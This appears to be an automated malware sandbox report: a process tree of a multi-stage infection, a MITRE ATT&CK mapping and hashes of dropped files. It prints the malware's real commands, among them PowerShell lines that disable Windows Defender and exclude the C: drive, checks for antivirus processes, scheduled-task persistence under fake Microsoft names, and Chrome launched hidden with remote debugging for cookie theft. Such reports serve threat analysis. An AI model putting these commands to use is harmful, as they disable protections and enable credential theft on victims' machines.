        sc stop ddrver
        12⤵
        Launches sc.exe
        
        PID:4116
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        12⤵
        Launches sc.exe
        
        PID:4032
        
        C:\Users\Admin\AppData\Local\Temp\10392520101\FOm9tvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392520101\FOm9tvc.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\10392530101\bprz1VA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392530101\bprz1VA.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\wow_6262_build (9).exe
        
        "C:\Users\Admin\AppData\Local\Temp\wow_6262_build (9).exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4736
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        8⤵
        Executes dropped EXE
        
        PID:4148
        
        C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        10⤵
        
        PID:980
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:2748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        10⤵
        
        PID:4636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        
        PID:1244
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Enumerates processes with tasklist
        
        PID:3588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        10⤵
        
        PID:3708
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        11⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\Luma_Crypt_Packlab.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Luma_Crypt_Packlab.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3044
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\10392540101\2c4d1738c3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392540101\2c4d1738c3.exe"
        7⤵
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\10392550101\5f684cd66b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392550101\5f684cd66b.exe"
        7⤵
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\10392560101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392560101\7IIl2eE.exe"
        7⤵
        
        PID:5380
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        8⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        
        PID:1620
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        9⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        9⤵
        Enumerates processes with tasklist
        
        PID:4476
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        9⤵
        
        PID:3224
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        9⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        9⤵
        
        PID:5740
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        9⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        9⤵
        
        PID:5380
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        9⤵
        
        PID:5980
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        9⤵
        
        PID:6032
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        9⤵
        
        PID:6116
        
        C:\Users\Admin\AppData\Local\Temp\10392570101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392570101\Rm3cVPI.exe"
        7⤵
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\10392580101\SPOKz5U.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392580101\SPOKz5U.exe"
        7⤵
        
        PID:5288
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:1328
        
        C:\Users\Admin\AppData\Local\Temp\10392590101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392590101\EPTwCQd.exe"
        7⤵
        
        PID:5352
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:5368
        
        C:\Users\Admin\AppData\Local\Temp\10392600101\z85yd_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392600101\z85yd_003.exe"
        7⤵
        
        PID:3560
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        
        PID:3356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5908
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        8⤵
        
        PID:5248
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        9⤵
        
        PID:780
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        9⤵
        
        PID:980
        
        C:\Users\Admin\AppData\Local\Temp\{7701243b-b462-4741-aaaf-7fb2c6ded471}\231d35f8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{7701243b-b462-4741-aaaf-7fb2c6ded471}\231d35f8.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        
        PID:9744
        
        C:\Users\Admin\AppData\Local\Temp\{8b63b22e-1c34-4653-961e-5d7feb050620}\fec5ba69.exe
        
        C:/Users/Admin/AppData/Local/Temp/{8b63b22e-1c34-4653-961e-5d7feb050620}/\fec5ba69.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        11⤵
        
        PID:10852
        
        C:\Users\Admin\AppData\Local\Temp\10392610101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392610101\TbV75ZR.exe"
        7⤵
        
        PID:5404
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:4848
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:4888
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 524
        9⤵
        Program crash
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\10392620101\nAM5wkr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392620101\nAM5wkr.exe"
        7⤵
        
        PID:5900
        
        C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" WindowsControl ENABLE & exit
        8⤵
        
        PID:6452
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST & exit
        8⤵
        
        PID:6460
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7288
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST & exit
        8⤵
        
        PID:6612
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7548
        
        C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
        
        "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe"
        8⤵
        
        PID:7796
        
        C:\Users\Admin\AppData\Local\Temp\10392640101\gLLOqKC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392640101\gLLOqKC.exe"
        7⤵
        
        PID:8284
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\a5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\a5.exe"
        8⤵
        
        PID:8668
        
        C:\Users\Admin\AppData\Local\Temp\10392650101\7c26170b9e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392650101\7c26170b9e.exe"
        7⤵
        
        PID:9416
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:9624
        
        C:\Users\Admin\AppData\Local\Temp\10392660101\c2116e491f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392660101\c2116e491f.exe"
        7⤵
        
        PID:11004
        
        C:\Users\Admin\AppData\Local\Temp\10392670101\9f10b729f7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392670101\9f10b729f7.exe"
        7⤵
        
        PID:12212
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - outlook_office_path
  - outlook_win_path
  PID:3356
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:880
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:4488
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2748
  - - C:\Windows\SysWOW64\findstr.exe
      findstr All
      4⤵
      System Location Discovery: System Language Discovery
      PID:4736
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3260
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:2016
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show networks mode=bssid
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:3716
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:4184
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff829d3dcf8,0x7ff829d3dd04,0x7ff829d3dd10
      4⤵
      PID:2428
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2000,i,14874041224642987640,1189344574760283824,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1996 /prefetch:2
      4⤵
      PID:4636
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,14874041224642987640,1189344574760283824,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2272 /prefetch:3
      4⤵
      PID:4072
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2360,i,14874041224642987640,1189344574760283824,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2524 /prefetch:8
      4⤵
      PID:552
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3256,i,14874041224642987640,1189344574760283824,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3268 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4212
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,14874041224642987640,1189344574760283824,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3332 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3636
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4332,i,14874041224642987640,1189344574760283824,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4352 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:5152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
  2⤵
  PID:552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
  2⤵
  PID:968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{c0613704-f465-4b3e-b77f-631df900cf9f}\967252ec-8f28-4580-8f11-23d8e7dda427.cmd"0
  2⤵
  PID:11148

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:4100

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2920

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1908

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:5560

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:2016

C:\Windows\SysWOW64\fontdrvhost.exe
"C:\Windows\System32\fontdrvhost.exe"
1⤵
PID:13164

C:\Windows\system32\regsvr32.EXE
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\1wlanapi.ocx"
1⤵
PID:13176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4888 -ip 4888
1⤵
PID:13188

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Authentication Process

T1556

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin:.repos

Filesize
1.2MB

MD5
186bd8fcf2640eed1c9ed7fab09d6776

SHA1
15ef36e9f1a57ff7ce542edfc8d5654332073d49

SHA256
5b6fe18c5791e4a0d0101643958e06c8dc94e37c2eaf072d321d1dfeabb35266

SHA512
562ed208cbfba825b64fb39e7017ec6af733ce9c349d97ddf2c8501e95af43db7779c60f97f0a79bb7a4e72255c21320e4dcf9235ae861713765f30741cc003c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

Filesize
44KB

MD5
b3744bcdfada42361045af680e63fe44

SHA1
e5cb1f8effa41152f48f12a4fe03bd2923b8086a

SHA256
cf2e3826e75769206f4f5577197f7d9331c1a734331118bd9f6ef9a1b6653e70

SHA512
21b3ed3833b2ad2dd18c1e65edcbdf4729fc5e09e802909e1ef342520f8dce4cd492e4d7d3d2949dae9f263ede5022eb6106263cdf430ac4a5a507f06d68b886

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

Filesize
264KB

MD5
3a8154ee8c0d572e4887936575a1ff73

SHA1
7f5ccceda32671f9eac54feef31604f657617f8b

SHA256
33f78adce079dbdf32e4699d0ad86a72dcae8ef5d2089105309230f28a449a6b

SHA512
7ec5b5d5143caa487e5552ab211b1be76e289f5448b4b80ddfc41cebfbfcd630d330bbc95722905fda4603875f31f327312a72614946f2c8269cf649c9f061af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3

Filesize
4.0MB

MD5
bafbb97284d4845c57800b32204d7666

SHA1
cc0baf105aa2ddba2abc764e2b71cc2aa338db2f

SHA256
f410c81ca4391699fa95bc41559c9fc414c9f3557ebb20a7ab8d3c81bf1bc56d

SHA512
727ebcca7b3aec28a1e75c3df123f48443db0b6405b8c8df9cecfd9c8a55702165eaf47e053c0cbaf0ef8ad155f2c25717f5bb35d1bee56c1c638897d58b1f6d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
46541ccdf0a8b9aca33d08f55c216319

SHA1
65bc825499c0d69c8ba5bb1b0967a920ffd45324

SHA256
a2ef05284323be5bc7bb424a4694c21a11c6b33a0ee31f6a529dbe11f1ddedb9

SHA512
167d2db92dda5c24522a39dc7c3ca4290af822b12f80532d9981f74b38ee591b5b91f232a96dec65edbbaebd1ceb75c36e6224e0a93b4bcf118810942647b6d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\9F6MUY9F\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\N5ALNTYG\soft[1]

Filesize
3.0MB

MD5
2cb4cdd698f1cbc9268d2c6bcd592077

SHA1
86e68f04bc99f21c9d6e32930c3709b371946165

SHA256
c89a0fea7c3850c8bf4b6a231a34cfb699c97783b1b2b1176070dd4d9cb4bd4a

SHA512
606216ce50d2c89f4700fd3f8853b09f5626615cac64bfe304c15524a908b4a220abed1a023b0f099d390a2e5b14e1dc4f94840aa398658188ad299c93939de3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
e9142b6bf6e252f51fb802bd5b2df88c

SHA1
e32ecfa7a08845a3db7bbc17fe6c34f845361d69

SHA256
a6fe6a508eee362bcaa0d3ea5d3f40ed36c3b360adae72c11db0bd4798ff6cca

SHA512
8c6c36d1242731868b4ce90d4a2df1e0b26355cf881f834631f3a8293071710fb09960e92a96750719aedddf2a168d44b02d7845f0da8d64508ced7f3e01b654

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
a69396cf186070303321b977e61ee1fb

SHA1
ecdb7c9e37bd102809576b58ad383deb8148ab9b

SHA256
5cdb49ef6f77ccbf8e40ddd44e0a5f59cf313c35470ed7fb010a4a0126e0998b

SHA512
940efa0267afb68d85493bc0e5fea8f28dbd75a5e646aece409e06e1d77b2b18e6dc6a40007d84fcc35218e98c6fdb87c2c38cac873ad7d9c45e5b7a2eff22ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
7ee4b79f57a6677837c2966a5865b2e1

SHA1
5fa31febc2d3efb6db5594b70a2b36f5bec48b47

SHA256
b6a132212d63282896848e1f3e2225c647c38a60a6f5e0557a4dc7962f425bd1

SHA512
7858940b7fe7c2b675e0ff2dbcf796dbb33c246a35b17257a6a294f830391e9ded2391056b4cd3daf1ef08fabc2fa5357c2e69438396bc57ee36ad8d1a74fc4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bde1c782de166c67d570341214e9397f

SHA1
7d377ab775f8a02d0ec16f699ff2bfbf1e0d4936

SHA256
af0fc430bd5bfca3f1d386c32f32b2e28768d30e6efc657cc016930747c9fd6e

SHA512
8fa8f5aac6ebe5330aef6a55321aa8b5933b2859dc84c7f5eb73e17cb94b07013b0420319773c329a5fe5e1fff08a1613a026bea7da8d5abb7f0133b4ce25f60

Download Submit
C:\Users\Admin\AppData\Local\Temp3011QWQQIZVBEPTOOR2SO3WRTQIK8UTU.EXE

Filesize
1.8MB

MD5
e854131d04c8dd3c20fb5ec7431cc775

SHA1
e4e589efb8a7ab77e1268c3e6cbb106cfe1da2b8

SHA256
6f645e790819c767d31820730e7dc6d980911c53b8c72a9f6bf58fc496bdc882

SHA512
841f5e4f4199ce8bdd14e665ebbad981fb10396d9bbf58453e01bb04c2548865734cdc2c782baa2e7e1b2ce7f4900a2ce8019a8fe82ac743e0512404a59ca8a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe

Filesize
1.7MB

MD5
6d7adc96b310e80799325edca02ff778

SHA1
